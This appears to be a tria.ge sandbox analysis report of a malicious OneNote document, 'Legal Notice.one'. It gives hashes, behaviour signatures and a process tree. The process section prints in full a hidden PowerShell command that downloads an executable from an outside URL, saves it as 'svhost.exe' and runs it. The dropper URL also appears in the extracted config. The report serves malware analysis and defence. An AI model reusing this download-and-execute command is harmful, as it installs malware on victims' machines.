Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Legal Notice.one

windows7-x64

10

Legal Notice.one

windows10-2004-x64

3

Resubmissions

20/03/2023, 10:38

230320-mphanada32 4

20/03/2023, 10:35

230320-mmszdafa2x 1

08/02/2023, 12:12

230208-pddt7sab3y 10

02/02/2023, 19:16

230202-xytp6ahh4w 1

Analysis

  • max time kernel
    75s
  • max time network
    74s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    08/02/2023, 12:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Legal Notice.one

  • Size

    639KB

  • MD5

    089299c68133a02272f7a05a66688c17

  • SHA1

    3f458042e06bb5c9422d5950478003d058d3facc

  • SHA256

    bf8c7c35cb5b8f47ad7fe7e89322960e105efa754360953ca854925a6b914092

  • SHA512

    e9f9c1b9b4f6e53f2a8d456180573f28740eee114846e943fd4d9958dd69f6a1db68f9db2878e3e4f823d24b33edf6b619cdffc9064c6ffc114190e654a2ca5c

  • SSDEEP

    6144:BN1HPGSx/IRbNPYCVa/68JDjUFQ5uB3c0U9lQcUgAyap70nGWOFX0YdXb9pYzjHc:4P

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops startup file 1 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE" "C:\Users\Admin\AppData\Local\Temp\Legal Notice.one"
    1⤵
    • Drops startup file
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
      /tsr
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:556
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\Admin\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svhost.exe'
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1700

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\Review.lnk
    Filesize

    2KB

    MD5

    ef7f9739337bc657cd0a63e32e27d0a1

    SHA1

    bf67555a7272f24ceb57b1c49e4cf37dc17b246f

    SHA256

    a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c

    SHA512

    e3d0a14ac1b9165e75e619aa6f76058a4c799bb722abaeafac977c35f31ab10ad8c8a51c7f3828bb896cbf339f971974a4fb26421ba6aea52530ac84b7785ada

    Download Submit

  • memory/1700-63-0x000000006BB10000-0x000000006C0BB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1700-64-0x000000006BB10000-0x000000006C0BB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1992-54-0x00000000724E1000-0x00000000724E3000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1992-55-0x0000000074F01000-0x0000000074F03000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1992-56-0x00000000734CD000-0x00000000734D8000-memory.dmp

    Filesize

    44KB

    Download

  • memory/1992-59-0x00000000734CD000-0x00000000734D8000-memory.dmp

    Filesize

    44KB

    Download